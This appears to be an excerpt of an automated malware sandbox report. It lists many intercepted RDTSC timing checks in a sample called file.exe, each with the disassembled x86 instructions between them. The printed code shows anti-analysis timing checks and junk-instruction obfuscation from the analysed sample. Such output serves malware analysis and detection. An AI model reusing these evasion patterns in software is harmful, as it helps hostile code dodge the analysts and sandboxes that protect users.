                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 627380 second address: 62739F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 626369 second address: 626389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b jp 00007FCBA4817E7Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628442 second address: 628447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 628447 second address: 62845A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E78h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62845A second address: 62845E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62845E second address: 628468 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A59E second address: 62A5AB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A734 second address: 62A7C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 nop 0x00000008 mov di, EC62h 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov edi, ecx 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push ecx 0x0000001f call 00007FCBA4817E78h 0x00000024 pop ecx 0x00000025 mov dword ptr [esp+04h], ecx 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc ecx 0x00000032 push ecx 0x00000033 ret 0x00000034 pop ecx 0x00000035 ret 0x00000036 and ebx, 3BDCC548h 0x0000003c xor edi, dword ptr [ebp+122D1825h] 0x00000042 mov eax, dword ptr [ebp+122D02B9h] 0x00000048 push 00000000h 0x0000004a push edi 0x0000004b call 00007FCBA4817E78h 0x00000050 pop edi 0x00000051 mov dword ptr [esp+04h], edi 0x00000055 add dword ptr [esp+04h], 00000016h 0x0000005d inc edi 0x0000005e push edi 0x0000005f ret 0x00000060 pop edi 0x00000061 ret 0x00000062 sub bh, FFFFFFA7h 0x00000065 push FFFFFFFFh 0x00000067 call 00007FCBA4817E7Fh 0x0000006c mov edi, dword ptr [ebp+122D279Ch] 0x00000072 pop ebx 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push esi 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62A7C0 second address: 62A7C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C966 second address: 62C96D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62E7CF second address: 62E7FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCBA46BC746h 0x00000008 jnp 00007FCBA46BC736h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007FCBA46BC738h 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62F784 second address: 62F789 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630731 second address: 630737 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630737 second address: 630761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007FCBA4817E78h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630761 second address: 6307CA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FCBA46BC738h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 jmp 00007FCBA46BC73Ah 0x00000028 push 00000000h 0x0000002a mov di, 9F92h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007FCBA46BC738h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a mov di, si 0x0000004d push eax 0x0000004e pushad 0x0000004f push eax 0x00000050 push edx 0x00000051 push edx 0x00000052 pop edx 0x00000053 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 632E35 second address: 632E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633CA6 second address: 633D11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push ebx 0x0000000d xor ebx, dword ptr [ebp+122D3926h] 0x00000013 pop ebx 0x00000014 push 00000000h 0x00000016 mov di, si 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push eax 0x0000001e call 00007FCBA46BC738h 0x00000023 pop eax 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 add dword ptr [esp+04h], 0000001Ah 0x00000030 inc eax 0x00000031 push eax 0x00000032 ret 0x00000033 pop eax 0x00000034 ret 0x00000035 movsx ebx, dx 0x00000038 mov edi, dword ptr [ebp+1244B235h] 0x0000003e xchg eax, esi 0x0000003f jmp 00007FCBA46BC743h 0x00000044 push eax 0x00000045 je 00007FCBA46BC748h 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633D11 second address: 633D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6308F2 second address: 630908 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCBA46BC73Ch 0x00000008 jnl 00007FCBA46BC736h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635D28 second address: 635DBC instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FCBA4817E78h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 mov ebx, dword ptr [ebp+122D388Eh] 0x0000002b call 00007FCBA4817E82h 0x00000030 jnl 00007FCBA4817E7Ch 0x00000036 pop edi 0x00000037 push 00000000h 0x00000039 jmp 00007FCBA4817E84h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push edi 0x00000043 call 00007FCBA4817E78h 0x00000048 pop edi 0x00000049 mov dword ptr [esp+04h], edi 0x0000004d add dword ptr [esp+04h], 00000017h 0x00000055 inc edi 0x00000056 push edi 0x00000057 ret 0x00000058 pop edi 0x00000059 ret 0x0000005a mov bl, ah 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 jg 00007FCBA4817E76h 0x00000067 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635DBC second address: 635DC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 630908 second address: 63090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635DC0 second address: 635DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 635DC6 second address: 635DCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 636D6C second address: 636D76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FCBA46BC736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633E98 second address: 633EC1 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCBA4817E80h 0x00000008 jmp 00007FCBA4817E7Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jbe 00007FCBA4817E82h 0x00000018 jmp 00007FCBA4817E7Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 633EC1 second address: 633ECB instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCBA46BC73Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 62C95B second address: 62C966 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FAF second address: 638FB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FB3 second address: 638FBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FBB second address: 638FD0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FCBA46BC740h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FD0 second address: 638FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FD8 second address: 638FDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 638FDE second address: 639003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E83h 0x0000000e push edi 0x0000000f je 00007FCBA4817E76h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639003 second address: 639008 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 639008 second address: 639012 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCBA4817E7Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E66E second address: 63E67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FCBA46BC73Ah 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63E67D second address: 63E6BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FCBA4817E7Ah 0x00000008 jp 00007FCBA4817E78h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 jmp 00007FCBA4817E82h 0x00000019 jmp 00007FCBA4817E80h 0x0000001e popad 0x0000001f push esi 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC46D second address: 5CC492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCBA46BC736h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007FCBA46BC743h 0x00000013 pop edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CC492 second address: 5CC498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642263 second address: 64228F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC73Fh 0x00000009 jmp 00007FCBA46BC744h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64228F second address: 642293 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 642293 second address: 6422F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007FCBA46BC745h 0x0000000f jne 00007FCBA46BC736h 0x00000015 pop ebx 0x00000016 jo 00007FCBA46BC741h 0x0000001c jmp 00007FCBA46BC73Bh 0x00000021 popad 0x00000022 push ebx 0x00000023 jmp 00007FCBA46BC742h 0x00000028 push eax 0x00000029 push edx 0x0000002a push edx 0x0000002b pop edx 0x0000002c push edi 0x0000002d pop edi 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6422F1 second address: 6422FB instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA4817E76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641948 second address: 64195C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 je 00007FCBA46BC736h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64195C second address: 641988 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jo 00007FCBA4817E9Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FCBA4817E76h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 641988 second address: 64198C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 646B14 second address: 646B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D732 second address: 64D74D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 jp 00007FCBA46BC736h 0x0000000c ja 00007FCBA46BC736h 0x00000012 push edi 0x00000013 pop edi 0x00000014 jnp 00007FCBA46BC736h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D74D second address: 64D76C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E80h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C541 second address: 64C547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C547 second address: 64C54C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C54C second address: 64C551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64C551 second address: 64C559 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CB47 second address: 64CB51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FCBA46BC736h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDB6 second address: 64CDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64CDBA second address: 64CDD8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCBA46BC736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c je 00007FCBA46BC73Ch 0x00000012 pop eax 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D40F second address: 64D415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D415 second address: 64D419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D59B second address: 64D59F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D59F second address: 64D5B1 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FCBA46BC736h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64D5B1 second address: 64D5D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnl 00007FCBA4817E76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6514A2 second address: 6514C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCBA46BC748h 0x00000009 pop edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF86F second address: 5CF874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF874 second address: 5CF879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CF879 second address: 5CF883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655976 second address: 655980 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCBA46BC736h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655980 second address: 655986 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 655986 second address: 65599E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCBA46BC738h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007FCBA46BC736h 0x00000012 jp 00007FCBA46BC736h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65599E second address: 6559B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E87h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65B7 second address: 5D65BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65BF second address: 5D65C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65C3 second address: 5D65E2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FCBA46BC736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FCBA46BC738h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FCBA46BC75Ah 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65E2 second address: 5D65ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5D65ED second address: 5D65F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65470F second address: 654731 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E88h 0x00000007 jns 00007FCBA4817E76h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 654731 second address: 65473D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FCBA46BC736h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 65473D second address: 654741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623033 second address: 623084 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FCBA46BC73Bh 0x0000000e nop 0x0000000f mov di, 3306h 0x00000013 lea eax, dword ptr [ebp+12482DDCh] 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FCBA46BC738h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 pushad 0x00000038 popad 0x00000039 jg 00007FCBA46BC736h 0x0000003f popad 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623084 second address: 623089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 623089 second address: 602FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007FCBA46BC738h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 mov ecx, eax 0x00000026 mov dx, si 0x00000029 call dword ptr [ebp+122D28EBh] 0x0000002f jc 00007FCBA46BC74Dh 0x00000035 jo 00007FCBA46BC738h 0x0000003b push esi 0x0000003c pop esi 0x0000003d push ecx 0x0000003e push esi 0x0000003f pop esi 0x00000040 jmp 00007FCBA46BC73Bh 0x00000045 pop ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 push edx 0x0000004a pop edx 0x0000004b jg 00007FCBA46BC736h 0x00000051 push edi 0x00000052 pop edi 0x00000053 popad 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6236AF second address: 6236B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6236B5 second address: 6236BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
